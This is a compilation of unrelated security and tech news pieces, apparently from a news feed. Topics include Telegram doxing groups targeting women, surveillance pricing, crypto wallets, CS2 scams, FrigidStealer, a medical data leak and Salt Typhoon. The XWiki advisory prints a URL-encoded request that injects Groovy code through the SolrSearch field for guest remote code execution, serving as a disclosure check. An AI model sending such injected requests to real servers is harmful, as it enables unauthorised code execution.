A WIRED investigation goes inside the Telegram groups targeting women who joined “Are We Dating the Same Guy?” groups on Facebook with doxing, harassment, and sharing of nonconsensual intimate images.

In late January, a warning spread through the London-based Facebook group Are We Dating the Same Guy?—but this post wasn’t about a bad date or a cheating ex. A connected network of male-dominated Telegram groups had surfaced, sharing and circulating nonconsensual intimate images of women. Their justification? Retaliation.

On January 23, users in the AWDTSG Facebook group began warning about hidden Telegram groups. Screenshots and TikTok videos surfaced, revealing public Telegram channels where users were sharing nonconsensual intimate images. Further investigation by WIRED identified additional channels linked to the network. By scraping thousands of messages from these groups, it became possible to analyze their content and the patterns of abuse.

AWDTSG, a sprawling web of over 150 regional forums across Facebook alone, with roughly 3 million members worldwide, was designed by Paolo Sanchez in 2022 in New York as a space for women to share warnings about predatory men. But its rapid growth made it a target. Critics argue that the format allows unverified accusations to spiral. Some men have responded with at least three defamation lawsuits filed in recent years against members, administrators, and even Meta, Facebook’s parent company. Others took a different route: organized digital harassment.

Primarily using Telegram group data made available through Telemetr.io, a Telegram analytics tool, WIRED analyzed more than 3,500 messages from a Telegram group linked to a larger misogynistic revenge network. Over 24 hours, WIRED observed users systematically tracking, doxing, and degrading women from AWDTSG, circulating nonconsensual images, phone numbers, usernames, and location data.

From January 26 to 27, the chats became a breeding ground for misogynistic, racist, sexual digital abuse of women, with women of color bearing the brunt of the targeted harassment and abuse. Thousands of users encouraged each other to share nonconsensual intimate images, often referred to as “revenge porn,” and requested and circulated women’s phone numbers, usernames, locations, and other personal identifiers.

As women from AWDTSG began infiltrating the Telegram group, at least one user grew suspicious: “These lot just tryna get back at us for exposing them.”

When women on Facebook tried to alert others of the risk of doxing and leaks of their intimate content, AWDTSG moderators removed their posts. (The group’s moderators did not respond to multiple requests for comment.) Meanwhile, men who had previously coordinated through their own Facebook groups like “Are We Dating the Same Girl” shifted their operations in late January to Telegram's more permissive environment. Their message was clear: If they can do it, so can we.

"In the eyes of some of these men, this is a necessary act of defense against a kind of hostile feminism that they believe is out to ruin their lives," says Carl Miller, cofounder of the Center for the Analysis of Social Media and host of the podcast _Kill List_.

The dozen Telegram groups that WIRED has identified are part of a broader digital ecosystem often referred to as the manosphere, an online network of forums, influencers, and communities that perpetuate misogynistic ideologies.

“Highly isolated online spaces start reinforcing their own worldviews, pulling further and further from the mainstream, and in doing so, legitimizing things that would be unthinkable offline,” Miller says. “Eventually, what was once unthinkable becomes the norm.”

This cycle of reinforcement plays out across multiple platforms. Facebook forums act as the first point of contact, TikTok amplifies the rhetoric in publicly available videos, and Telegram is used to enable illicit activity. The result? A self-sustaining network of harassment that thrives on digital anonymity.

TikTok amplified discussions around the Telegram groups. WIRED reviewed 12 videos in which creators, of all genders, discussed, joked about, or berated the Telegram groups. In the comments section of these videos, users shared invitation links to public and private groups and some public channels on Telegram, making them accessible to a wider audience. While TikTok was not the primary platform for harassment, discussions about the Telegram groups spread there, and in some cases users explicitly acknowledged their illegality.

TikTok tells WIRED that its Community Guidelines prohibit image-based sexual abuse, sexual harassment, and nonconsensual sexual acts, and that violations result in removals and possible account bans. They also stated that TikTok removes links directing people to content that violates its policies and that it continues to invest in Trust and Safety operations.

Intentionally or not, the algorithms powering social media platforms like Facebook can amplify misogynistic content. Hate-driven engagement fuels growth, pulling new users into these communities through viral trends, suggested content, and comment-section recruitment.

As people caught notice on Facebook and TikTok and started reporting the Telegram groups, they didn’t disappear—they simply rebranded. Reactionary groups quickly emerged, signaling that members knew they were being watched but had no intention of stopping. Inside, messages revealed a clear awareness of the risks: Users knew they were breaking the law. They just didn’t care, according to chat logs reviewed by WIRED. To absolve themselves, one user wrote, “I do not condone im \[simply\] here to regulate rules,” while another shared a link to a statement that said: “I am here for only entertainment purposes only and I don’t support any illegal activities.”

Meta did not respond to a request for comment.

Messages from the Telegram group WIRED analyzed show that some chats became hyper-localized, dividing London into four regions to make harassment even more targeted. Members casually sought access to other city-based groups: “Who’s got brum link?” and “Manny link tho?”—British slang referring to Birmingham and Manchester. They weren’t just looking for gossip. “Any info from west?” one user asked, while another requested, “What’s her @?”— hunting for a woman’s social media handle, a first step to tracking her online activity.

The chat logs further reveal how women were discussed as commodities. “She a freak, I’ll give her that,” one user wrote. Another added, “Beautiful. Hide her from me.” Others encouraged sharing explicit material: “Sharing is caring, don’t be greedy.”

Members also bragged about sexual exploits, using coded language to reference encounters in specific locations, and spread degrading, racial abuse, predominantly targeting Black women.

Once a woman was mentioned, her privacy was permanently compromised. Users frequently shared social media handles, which led other members to contact her—soliciting intimate images or sending disparaging texts.

Anonymity can be a protective tool for women navigating online harassment. But it can also be embraced by bad actors who use the same structures to evade accountability.

"It’s ironic," Miller says. "The very privacy structures that women use to protect themselves are being turned against them."

The rise of unmoderated spaces like the abusive Telegram groups makes it nearly impossible to trace perpetrators, exposing a systemic failure in law enforcement and regulation. Without clear jurisdiction or oversight, platforms are able to sidestep accountability.

Sophie Mortimer, manager of the UK-based Revenge Porn Helpline, warned that Telegram has become one of the biggest threats to online safety. She says that the UK charity’s reports to Telegram of nonconsensual intimate image abuse are ignored. “We would consider them to be noncompliant to our requests,” she says. Telegram, however, says it received only “about 10 piece of content” from the Revenge Porn Helpline, “all of which were removed.” Mortimer did not yet respond to WIRED’s questions about the veracity of Telegram’s claims.

Despite recent updates to the UK’s Online Safety Act, legal enforcement of online abuse remains weak. An October 2024 report from the UK-based charity The Cyber Helpline shows that cybercrime victims face significant barriers in reporting abuse, and justice for online crimes is seven times less likely than for offline crimes.

"There’s still this long-standing idea that cybercrime doesn’t have real consequences," says Charlotte Hooper, head of operations of The Cyber Helpline, which helps support victims of cybercrime. "But if you look at victim studies, cybercrime is just as—if not more—psychologically damaging than physical crime."

A Telegram spokesperson tells WIRED that its moderators use “custom AI and machine learning tools” to remove content that violates the platform's rules, “including nonconsensual pornography and doxing.”

“As a result of Telegram's proactive moderation and response to reports, moderators remove millions of pieces of harmful content each day,” the spokesperson says.

Hooper says that survivors of digital harassment often change jobs, move cities, or even retreat from public life due to the trauma of being targeted online. The systemic failure to recognize these cases as serious crimes allows perpetrators to continue operating with impunity.

Yet, as these networks grow more interwoven, social media companies have failed to adequately address gaps in moderation.

Telegram, despite its estimated 950 million monthly active users worldwide, claims it’s too small to qualify as a “Very Large Online Platform” under the European Union’s Digital Service Act, allowing it to sidestep certain regulatory scrutiny. “Telegram takes its responsibilities under the DSA seriously and is in constant communication with the European Commission,” a company spokesperson said.

In the UK, several civil society groups have expressed concern about the use of large private Telegram groups, which allow up to 200,000 members. These groups exploit a loophole by operating under the guise of “private” communication to circumvent legal requirements for removing illegal content, including nonconsensual intimate images.

Without stronger regulation, online abuse will continue to evolve, adapting to new platforms and evading scrutiny.

The digital spaces meant to safeguard privacy are now incubating its most invasive violations. These networks aren’t just growing—they’re adapting, spreading across platforms, and learning how to evade accountability.

Inside the Telegram Groups Doxing Women for Their Facebook Posts

This week on the Lock and Code podcast… Insurance pricing in America makes a lot of sense so long as you’re...

_This week on the Lock and Code podcast…_

Insurance pricing in America makes a lot of sense so long as you’re one of the insurance companies. Drivers are charged more for traveling long distances, having low credit, owning a two-seater instead of a four, being on the receiving end of a car crash, and—increasingly—for any number of non-determinative data points that insurance companies use to assume higher risk.

It’s a pricing model that most people find distasteful, but it’s also a pricing model that could become the norm if companies across the world begin implementing something called “surveillance pricing.”

Surveillance pricing is the term used to describe companies charging people different prices for the exact same goods. That 50-inch TV could be $800 for one person and $700 for someone else, even though the same model was bought from the same retail location on the exact same day. Or, airline tickets could be more expensive because they were purchased from a more expensive device—like a Mac laptop—and the company selling the airline ticket has decided that people with pricier computers can afford pricier tickets.

Surveillance pricing is only possible because companies can collect enormous arrays of data about their consumers and then use that data to charge individual prices. A test prep company was once caught charging customers more if they lived in a neighborhood with a higher concentration of Asians, and a retail company was caught charging customers more if they were looking at prices on the company’s app while physically located in a store’s parking lot.

This matter of data privacy isn’t some invisible invasion online, and it isn’t some esoteric framework of ad targeting, this is you paying the most that a company believes you will, for everything you buy.

And it’s happening right now.

Today, on the Lock and Code podcast with host David Ruiz, we speak with Consumer Watchdog Tech Privacy Advocate Justin Kloczko about where surveillance pricing is happening, what data is being used to determine prices, and why the practice is so nefarious.  

“It’s not like we’re all walking into a Starbucks and we’re seeing 12 different prices for a venti mocha latte,” said Kloczko, who recently authored a report on the same subject. “If that were the case, it’d be mayhem. There’d be a revolution.”

Instead, Kloczko said:

> “Because we’re all buried in our own devices—and this is really happening on e-commerce websites and online, on your iPad, on your phone—you’re kind of siloed in your own world and companies can get away with this.”

Tune in today for the full conversation.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 Surveillance pricing is &#8220;evil and sinister,&#8221; explains Justin Kloczko (Lock and Code S06E04) 

Payment Orchestration Platforms streamline transactions by routing payments through multiple providers, reducing costs, boosting approval rates, and enhancing…

Payment Orchestration Platforms streamline transactions by routing payments through multiple providers, reducing costs, boosting approval rates, and enhancing security.

****How Does Payment Orchestration Work?****

A Payment Orchestration Platform (POP) functions as an intelligent intermediary between merchants and multiple payment service providers (PSPs). It facilitates seamless payment transactions by dynamically selecting the best route for each payment, optimizing approval rates, reducing costs, and enhancing security.

By leveraging real-time analytics and machine learning, POPs improve transaction efficiency by identifying the most reliable and cost-effective payment pathway. Additionally, advanced security protocols, such as tokenization and AI-driven fraud detection, protect customer data. With payment orchestration, businesses can scale efficiently while maintaining high-security standards and minimizing transaction failures.

****Core Functions of Payment Orchestration Services****

According to Akurateco, a payment orchestration service, core functions of payment orchestration services offer several functions:

*   **Multi-Provider Connectivity**: Payment orchestration platforms seamlessly integrate with multiple PSPs, acquirers, and alternative payment methods. Instead of requiring businesses to establish individual connections, the platform offers a single integration point that enables access to various payment providers. This flexibility ensures firms can easily expand into new markets without undergoing extensive technical adjustments.

*   **Intelligent Transaction Routing**: Dynamic payment routing directs each transaction to the optimal payment provider based on predefined parameters such as transaction amount, geographical region, historical approval rates, and real-time risk assessment. Businesses can enhance approval rates and reduce unnecessary payment processing fees by routing transactions through the most reliable and cost-effective channels.

*   **Security & Compliance**: Security remains a top priority in digital transactions. Payment orchestration platforms employ multiple layers of protection, including:
    *   **Tokenization and encryption** to safeguard sensitive payment information.
    *   **AI-powered fraud detection** to identify and mitigate suspicious transactions in real-time.
    *   **Multi-factor authentication (MFA)** for added security.
    *   **Compliance with global regulations,** such as PCI DSS 3.2 and GDPR, ensures businesses meet legal and industry standards.

*   **Automated Retry & Failover Mechanisms**: If a transaction fails due to provider issues, a Payment Orchestration Platform automatically retries the transaction with an alternative acquirer or PSP. This ensures continuity in payment processing, minimizes failed transactions and improves overall revenue retention. The automated failover mechanism is particularly beneficial for subscription-based businesses and eCommerce merchants, where transaction reliability directly impacts customer experience and retention rates.

*   **Real-Time Analytics & Reporting**: Payment orchestration platforms provide businesses with actionable insights through advanced analytics dashboards. Companies can track approval rates, monitor payment trends, and identify cost-saving opportunities in real time. This level of transparency allows merchants to optimize their financial strategies and make data-driven decisions to improve profitability.

****Business Benefits of Payment Orchestration****

*   **Increased Approval Rates**: By leveraging intelligent transaction routing and failover mechanisms, payment orchestration platforms significantly improve approval rates. Payments are directed to providers with the highest probability of success, reducing declines and enhancing customer satisfaction.

*   **Lower Payment Processing Costs**: Businesses can minimize transaction fees by selecting the most cost-effective payment service providers for each transaction. Competitive acquirer selection helps reduce unnecessary expenses, ultimately increasing profitability.

*   **Faster Market Expansion**: Supporting multiple payment providers and localized payment methods allows businesses to enter new markets without the technical challenges of integrating with multiple PSPs. This accelerates global expansion and ensures a seamless payment experience for international customers.

*   **Enhanced Customer Experience**: A smooth, frictionless payment process improves the overall customer journey. Businesses can foster trust and long-term customer relationships with reduced transaction failures, secure payments, and support for various payment options.

****Akurateco: A Leader in Payment Orchestration****

Akurateco is a cutting-edge white-label Payment Orchestration Platform designed to simplify and optimize payment processing. Offering strong fraud prevention, multi-acquirer support, and advanced analytics, Akurateco helps businesses manage their transactions efficiently and securely.

****Why Businesses Trust Akurateco****

*   **Smart Routing & AI Optimization** – Advanced algorithms analyze transaction patterns and direct payments to the most successful processing routes, improving approval rates and minimizing costs.

*   **Global Payment Method Support** – Seamless integration with leading international and local PSPs ensures businesses can accept payments across diverse markets without additional complexity.

*   **Advanced Fraud Prevention** – AI-powered fraud detection and risk assessment tools minimize fraudulent activities, protecting both businesses and customers.

*   **Scalable & Customizable Solutions** – Whether a startup or an enterprise, Akurateco offers tailored solutions that adapt to unique business needs, ensuring maximum flexibility and scalability.

*   **Seamless Integration & Real-Time Reporting** – The platform provides a single integration point, reducing technical overhead while offering comprehensive transaction insights to drive informed business decisions.

****Final Thoughts****

Adopting a Payment Orchestration Platform is crucial for businesses looking to simplify payment processing, reduce costs, and increase revenue. By consolidating payment providers, automating transaction routing, and enhancing security, payment orchestration platforms empower businesses to achieve seamless financial operations.

A leading provider like Akurateco offers innovative and secure payment solutions that enable companies to unlock new growth opportunities while ensuring reliable and secure transactions. Businesses that invest in payment orchestration today will be well-positioned to succeed in the competitive digital market of tomorrow.

Featured Image via Pixabay/Megan RX

How Payment Orchestration Enhances Business Efficiency

Crypto wallets are essential in keeping your cryptocurrency safe. There are different types of wallets available and choosing…

Crypto wallets are essential in keeping your cryptocurrency safe. There are different types of wallets available and choosing one can be confusing for so many investors. The three commonly used are mobile, desktop, and hardware wallets. 

Mobile and desktop wallets are called hot wallets, which means they are connected to the internet. Hardware wallets, on the other hand, are cold and thus don’t require Wi-Fi. However, all these wallets are non-custodial. You have the full responsibility of protecting your keys.

In this article, we will look at mobile, desktop, and hardware wallets to help you determine the best option for your investment. 

****Hardware Wallet****

Hardware crypto wallets offer offline protection. These are physical devices used to store your private keys. Since they are not connected to the internet or any other devices, hardware wallets are typically considered more secure, but they can be a little complicated to use. 

Modern hardware wallets are more refined. For example, if we look at the Tangem wallet review, you will learn that these devices are designed similarly to modern credit cards and use smartphone displays, making them convenient to carry around. 

Hardware wallets are ideal for large investments since they are highly secure and less susceptible to online attacks. It is best to buy these wallets from authorized dealers or the main company to avoid getting a counterfeit one. 

****Mobile Wallets****

Mobile crypto wallets are apps you can download on your phone to manage your cryptocurrency. It can be on your main phone or another mobile device. These wallets are very portable, enabling you to make transactions on the go. Most mobile wallets have a PIN and a recovery phrase to increase security. 

The major downside is walking around with your wallet is risky. You can easily lose your phone, which makes your wallet vulnerable to hacking. However, some people are adopting to use of a second phone as their mobile wallet which is more secure. The phone is often disconnected from WiFi and may even not include a plan. You only switch it on when making a transaction. 

Generally, mobile wallets are ideal for people who use crypto often, especially in small transactions. It is also a good option for beginners who don’t have a large investment. 

****Desktop Crypto Wallets****

Desktop wallets are software or programs you can install on your computer. Most wallets are compatible with common operating systems like Windows, Linux, and Mac. These are very similar to desktop wallets but some providers offer extra advantages. 

For example, some software wallets allow you to keep your keys offline on a USB drive, essentially functioning like hybrid crypto wallets. Desktop wallets are more secure than mobile ones but are not portable since it is not quite convenient to carry your desktops everywhere. 

The main risk is that if your device gets infected by a virus or malware, your crypto could be jeopardized. Desktop wallets are a good alternative for anyone looking for a secure wallet that is not for everyday use.

****Conclusion****

Choosing the best crypto wallet depends on your use and the size of the investment. For those who use crypto daily, mobile wallets are the best choice. If you want a foolproof, secure wallet, opt for hardware. However, if you are using browser-generated wallets watch out for security vulnerabilities like Randstorm which is currently impacting billions in crypto assets worldwide.

1.  Benefits of Using an Anonymous Bitcoin Wallet
2.  Biggest Crypto Scam Tactics and How to Avoid Them
3.  Power Plants to eWallets: ZTNA’s Role in the Gig Economy
4.  Study Finds AI Guesses Crypto Seed Phrases in 0.02 Seconds
5.  The Growing Importance of Secure Crypto Payment Gateways

Hardware Crypto Wallets vs. Mobile vs. Desktop: Which Should You Choose?

Bitdefender warns CS2 fans of scams using hijacked YouTube channels, fake giveaways, and crypto fraud. Protect your Steam account and avoid phishing traps.

Bitdefender Labs has uncovered a series of scams targeting the Counter-Strike 2 (CS2) community, exploiting major esports events like IEM Katowice 2025 and PGL Cluj-Napoca 2025.

According to Bitdefender’s investigation, shared with Hackread.com, cybercriminals are hijacking YouTube channels and impersonating popular professional players such as s1mple, NiKo, and donk to trick fans into fraudulent giveaways. These scams have several stages and aim to steal Steam accounts, cryptocurrency, and valuable in-game items.

First, scammers hack YouTube accounts, often those with established subscriber bases.  They then rebrand these channels to mimic well-known CS2 pros, removing original content.  

Next, they broadcast fake livestreams, using looped gameplay footage to create the illusion of a live event. These fake streams promote fake giveaways of CS2 skins, cases, or cryptocurrency, often using QR codes or malicious links to direct viewers to malicious websites. 

Fake CS2 impersonations, fraudulent skin giveaways, and hacked YouTube channels streaming deceptive livestreams (Source: Bitdefender).

These websites prompt victims to either log in with their Steam accounts, leading to inventory theft, or send cryptocurrency with promises of doubled returns, resulting in direct theft of digital assets. To appear more legitimate, scammers often post about the fake giveaways in the community section of the hijacked channel, disabling comments except for their own deceptive messages.

Bitdefender’s report found that scammers are also running cryptocurrency-doubling schemes. In these scams, they entice victims to send Bitcoin or Ethereum with the promise of doubling their investment. These schemes often use fake endorsements from CS.MONEY or professional players, falsely advertising substantial prize pools.

Some red flags include promises of doubling deposits, requests to send cryptocurrency up front, and a lack of verifiable association with legitimate esports organizations. These scams are strategically timed to coincide with major esports events like IEM Katowice and PGL Cluj-Napoca to maximize their reach.

“Scammers, tactics are evolving to exploit the hype surrounding major esports events. Whether they are stealing Steam inventories or cryptocurrency deposits, their goal is always financial gain at the expense of unsuspecting players. If there’s one thing gamers should remember is that in the world of CS2 and esports, nothing valuable comes for free!” they concluded.

Therefore, gamers should verify YouTube channels’ legitimacy by checking for content beyond livestreams and recent uploads and avoid clicking on suspicious links and QR codes. They also advise against CS2 giveaways, as legitimate ones are rare and typically hosted by official esports organizations.

Bitdefender also warns content creators, including those streaming esports and CS2, about potential phishing threats. Moreover, to protect your Steam account, enable Steam Guard Mobile Authenticator and Steam’s Multi-Factor Authentication. Regularly review login activity for unauthorized access, report suspicious activity or livestreams to YouTube and warn other gaming communities. 

1.  **Hackers Using Fake YouTube Links to Steal Login Data**
2.  **Malware in Fake Business Proposals Hits YouTube Creators**
3.  **New YouTube phishing scam using authentic email address**
4.  **“Get Paid to Like Videos” YouTube Scam Leads to Empty Wallets**
5.  **Hacked YouTube Channels Use Trump Assassination for Crypto Scam**

Hackers Hijack YouTube Channels to Target CS2 Fans with Fake Giveaways

### Impact
Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation.

To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable.

### Patches
This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1.

### Workarounds
[This line](https://github.com/xwiki/xwiki-platform/blob/568447cad5172d97d6bbcfda9f6183689c2cf086/xwiki-platform-core/xwiki-platform-search/xwiki-platform-search-solr/xwiki-platform-search-solr-ui/src/main/resources/Main/SolrSearchMacros.xml#L955) in `Main.SolrSearchMacros` can be edited to match the `rawResponse` macro defined [here](https://github.com/xwiki/xwiki-platform/blob/67021db9b8ed26c2236a653269302a86bf01ef40/xwiki-platform-core/xwiki-platform-web/xwiki-platform-web-templates/src/main/resources/templates/macros.vm#L2824) with a content type of `application/xml`, instead of simply outputting the content of the feed.

### References

* https://jira.xwiki.org/browse/XWIKI-22149
* https://github.com/xwiki/xwiki-platform/commit/67021db9b8ed26c2236a653269302a86bf01ef40

### Attribution
This vulnerability has been reported by John Kwak for Trend Micro's Zero Day Initiative.

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.

Attack complexity: More severe for the least complex attacks.

Privileges required: More severe if no privileges are required.

User interaction: More severe when no user interaction is required.

Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.

Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.

Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.

Availability: More severe when the loss of impacted component availability is highest.

GHSA-rr6p-3pfg-562j: XWiki Platform allows remote code execution as guest via SolrSearchMacros request

William discusses what happens when security is an afterthought rather than baked into processes and highlights the latest of Talos' security research.

Thursday, February 20, 2025 14:02

Welcome to this week’s edition of the Threat Source newsletter. 

 Benjamin Franklin once said, "Those who would give up essential Liberty, to purchase a little temporary Safety, deserve neither Liberty nor Safety." In much the same way, those who rush for efficiency without taking into account security end up neither efficient nor secure.  

The past week the Department of Government Efficiency (or DOGE) has put on a clinic of how not to do things. For example, the Doge.gov website was easily and immediately compromised. Researchers were able to push updates to the public website via access to a database of government employment information. Not to be outdone the DOGE team hastily stood up the Waste.gov website which still had a placeholder Wordpress default template, including the sample text which features an imaginary architecture firm called Études, from a default WordPress theme called Twenty Twenty-Four. This slapdash nonsense was hidden behind a password wall after the research information became public.  

It’s really an excellent lesson in what happens when security is not taken into account and the instant ramifications. As an entire infosec community we’ve talked at length about how baking security into every decision is incredibly important and that trying to bolt on fixes after the fact not only doesn’t work but highlights the lack of rigor and awareness of security in the room - creating an attractive target.

Let’s take a deep breath, take a moment to create a more secure process, follow those processes, and ensure security is in place at every step - then we can attack matters of efficiency.  

**The one big thing **

Cisco Talos has published a blog on the ongoing research into Salt Typhoon. Cisco Talos been closely monitoring reports of widespread intrusion activity against several major U.S. telecommunications companies, an issue that we have been concerned with for a long time here at Talos. The activity, initially reported in late 2024 and later confirmed by the U.S. government, is being carried out by a highly sophisticated threat actor dubbed Salt Typhoon.  

A hallmark of this campaign is the use of living-off-the-land (LOTL) techniques on network devices. It is important to note that while the telecommunications industry is the primary victim, the advice contained herein is relevant to, and should be considered by, all infrastructure defenders. 

**Why do I care? **

State sponsored actors have been aggressively targeting global network infrastructure and understanding and mitigating these actions will help you improve your network infrastructure resilience. 

**So now what? **

Cisco Talos has released an extensive list of preventative measures for general and Cisco-specific devices which can be found in the Salt Typhoon blog post.  

**Top security headlines of the week **

Palo Alto Networks has warned that hackers are exploiting another vulnerability in its firewall software to break into unpatched customer networks. (TechCrunch)  

Security researchers warn a critical vulnerability in SonicWall’s SonicOS is under active exploitation.(CyberSecurityDrive) 

Two security vulnerabilities have been discovered in the OpenSSH secure networking utility suite that, if successfully exploited, could result in an active machine-in-the-middle (MitM) and a denial-of-service (DoS) attack, respectively, under certain conditions. (TheHackerNews) 

**Can’t get enough Talos? **

*   Talos Vulnerability Research: ClearML and NVIDIA 
*   Vulnerability Deep Dive: Small praise for modern compilers - A case of Ubuntu printing vulnerability that wasn’t 

**Upcoming events where you can find Talos **

RSA (April 28-May 1, 2025)   
 San Francisco, CA 

CTA TIPS 2025 (May 14-15, 2025)    
Arlington, VA 

**Most prevalent malware files from Talos telemetry over the past week  **

SHA 256:7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5  MD5: ff1b6bb151cf9f671c929a4cbdb64d86     
VirusTotal : https://www.virustotal.com/gui/file/7b3ec2365a64d9a9b2452c22e82e6d6ce2bb6dbc06c6720951c9570a5cd46fe5   
Typical Filename: endpoint.query  
Claimed Product: Endpoint-Collector   
Detection Name: W32.File.MalParent     

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91     
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details%C2%A0   
Typical Filename: c0dwjdi6a.dll    
Claimed Product: N/A  
Detection Name: Trojan.GenericKD.33515991 

SHA 256:9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507   
Typical Filename: VID001.exe   
Detection Name: Simple\_Custom\_Detection 

SHA 256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca  
MD5: 71fea034b422e4a17ebb06022532fdde  
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca   
Typical Filename: VID001.exe  
Claimed Product: N/A  
Detection Name: Coinminer:MBT.26mw.in14.Talos

Efficiency? Security? When the quest for one grants neither.

Fake browser update scams now target Mac, Windows, and Android users, delivering malware like FrigidStealer, Lumma Stealer, and…

Fake browser update scams now target Mac, Windows, and Android users, delivering malware like FrigidStealer, Lumma Stealer, and Marcher trojan through compromised websites.

Cybersecurity researchers at Proofpoint have identified two new cybercriminal groups behind a wave of fake browser update scams designed to infect users with malware. These groups, tracked as TA2726 and TA2727, are using compromised websites to trick visitors into downloading malicious software with now including a newly discovered Mac-specific information stealer called FrigidStealer.

****How the Attack Works****

The scam relies on web injects, a technique where attackers insert malicious code into legitimate websites. When users visit an infected site, they see a fake browser update prompt urging them to download and install an update. Instead of a real update, the download delivers malware that can steal sensitive data or install more dangerous payloads.

****TA2726 and TA2727****

TA2726 operates as a traffic seller, essentially providing this redirection service for other malicious actors. Researchers believe that TA2726 appears to be working alongside TA569, a previously known threat actor and once the main player in “fake update” campaigns. TA2727, on the other hand, according to Proofpoint’s blog post, is actively distributing malware itself, often employing the “fake update” ruse to trick users.

One recent campaign observed TA2727 delivering different malware based on the victim’s location. In the United States and Canada, users were directed to the SocGholish inject, which led to the installation of malware. But in Europe, Windows users encountered a fake browser update prompt that installed the Lumma Stealer, while Android users were targeted with the Marcher banking trojan.

****FrigidStealer macOS Malware****

The new FrigidStealer targets Mac users, and the attack starts with a fake update message that redirects them to a malicious file. If clicked, the file, disguised as a browser update (both Chrome and Safari), installs the information stealer. FrigidStealer then secretly harvests sensitive data like browser cookies, files related to passwords and cryptocurrencies, and even Apple Notes, just like the recently spotted new variant of the XCSSET malware.

Fake Safari and Chrome browser update websites delivering FrigidStealer (Via: Proofpoint)

The malware is written in Go and uses WailsIO, a framework that allows the fake update window to look realistic. It also bypasses Mac’s Gatekeeper security feature by requiring users to right-click and select “Open,” a common trick used by Mac malware authors.

****Windows and Android Users Also Targeted****

Mac users aren’t the only ones at risk. The same attack chain has been found delivering Marcher banking trojan for Android and Lumma Stealer and DeerStealer for Windows.

For Android users, clicking the update downloads Marcher, a banking trojan that has been active since 2013 and is designed to steal login credentials from banking apps. If a Windows user clicks the fake update, they receive an MSI installer that loads a trojanized DLL, ultimately running Lumma Stealer to extract credentials and financial data.

Users can still protect themselves by learning basic cybersecurity practices, learning how to spot a phishing email, avoiding third-party apps and tools, and scanning files and links on sites like VirusTotal or ANY.RUN.

New FrigidStealer Malware Infects macOS via Fake Browser Updates

A Dallas, Texas-based clinical research firm had its database exposed, containing sensitive personal healthcare records of over 1.6…

A Dallas, Texas-based clinical research firm had its database exposed, containing sensitive personal healthcare records of over 1.6 million individuals – all without any security authentication.

A misconfigured healthcare database containing over 1.6 million records related to medical surveys was recently discovered to be publicly accessible online without any encryption, password protection or security authentication.

The database belonged to DM Clinical Research, a Texas-based network of clinical trial sites. This was revealed to Hackread.com by cybersecurity expert Jeremiah Fowler who discovered the database and published their findings with Website Planet on 18 February 2025.

The database contained a treasure trove of personal and medical information, including names, dates of birth, phone numbers, email addresses, vaccination statuses, and current medications. Some surveys even included notes about adverse reactions to COVID-19 vaccines, doctor’s names, and whether the individual was on birth control or pregnant.

DM Clinical Research, which partners with pharmaceutical companies and medical organizations to conduct research studies and surveys, has stated that protecting sensitive data is a top priority. The company restricted access to the database after being notified by Fowler, but it is still unclear how long the database was exposed or if anyone else gained access to it.

It remains unclear whether the database was managed directly by DM Clinical Research or through a third-party contractor. Nevertheless, although the data originated from surveys and not full medical records, the potential for harm is significant.

This type of exposed health data could be attractive to data brokers and could even influence health insurance companies, potentially leading to higher premiums based on leaked health information.

On the other hand, if accessed by threat actors with malicious intent; the data could be leaked on cybercrime forums or sold to interested parties ultimately putting unsuspected and already vulnerable individuals at even greater risk including phishing, smishing (SMS Phishing), identity theft and even online blackmail.

1.  **In the jungle of AWS S3 Enumeration**
2.  **Builder.ai Database Exposes 1.29 TB of Unsecured Records**
3.  **1.17TB Data Leak Exposes Billions of IoT Grow Light Records**
4.  **Propertyrec Leaks Half a Million Background Check Records**
5.  **Canadian Eyecare Firm Care1 Leaks 2.2TB of Patient Records**

Clinical Research Firm Exposes 1.6 Million US Medical Survey Records

Cisco Talos has been closely monitoring reports of widespread intrusion activity against several major U.S. telecommunications companies, by a threat actor dubbed Salt Typhoon. This blog highlights our observations on this campaign and identifies recommendations for detection and prevention.

Thursday, February 20, 2025 08:00

**Summary**

Cisco Talos has been closely monitoring reports of widespread intrusion activity against several major U.S. telecommunications companies. The activity, initially reported in late 2024 and later confirmed by the U.S. government, is being carried out by a highly sophisticated threat actor dubbed Salt Typhoon. This blog highlights our observations on this campaign and identifies recommendations for detection and prevention of the actor’s activities.

